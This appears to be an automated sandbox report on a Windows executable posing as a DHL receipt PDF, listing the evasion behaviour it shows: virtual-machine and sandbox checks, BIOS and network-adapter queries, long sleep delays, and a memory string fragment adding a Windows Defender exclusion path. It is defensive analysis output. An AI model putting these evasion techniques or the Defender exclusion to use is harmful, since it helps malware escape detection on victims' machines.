                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.28d8f58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.DHL_119040 ontvangstbewijs,pdf.exe.296b68c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL_119040 ontvangstbewijs,pdf.exe PID: 4532, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5208Thread sleep count: 1131 > 30
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239859s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5208Thread sleep count: 1478 > 30
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 4592Thread sleep time: -39145s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239734s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239625s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239511s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239406s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239297s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239141s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -239030s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238922s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238781s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238671s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238562s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238437s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238328s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -238216s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -237953s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -237703s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -237141s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -236547s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -236250s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -236047s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 5268Thread sleep time: -235903s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 4344Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 1068Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 1432Thread sleep count: 3086 > 30
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe TID: 1432Thread sleep count: 6732 > 30
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239859
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239734
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239625
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239511
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239406
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239297
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239141
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239030
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238922
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238781
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238437
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238328
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238216
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237953
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237703
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237141
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236547
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236250
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236047
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 235903
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWindow / User API: threadDelayed 1131
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWindow / User API: threadDelayed 1478
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWindow / User API: threadDelayed 3086
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWindow / User API: threadDelayed 6732
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 240000
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239859
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 39145
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239734
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239625
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239511
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239406
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239297
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239141
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 239030
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238922
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238781
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238671
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238562
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238437
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238328
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 238216
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237953
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237703
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 237141
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236547
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236250
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 236047
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 235903
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeThread delayed: delay time: 922337203685477
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeCode function: 4_2_00C8F118 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeProcess created: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566529351.0000000001230000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566529351.0000000001230000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566529351.0000000001230000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: DHL_119040 ontvangstbewijs,pdf.exe, 00000004.00000002.566529351.0000000001230000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
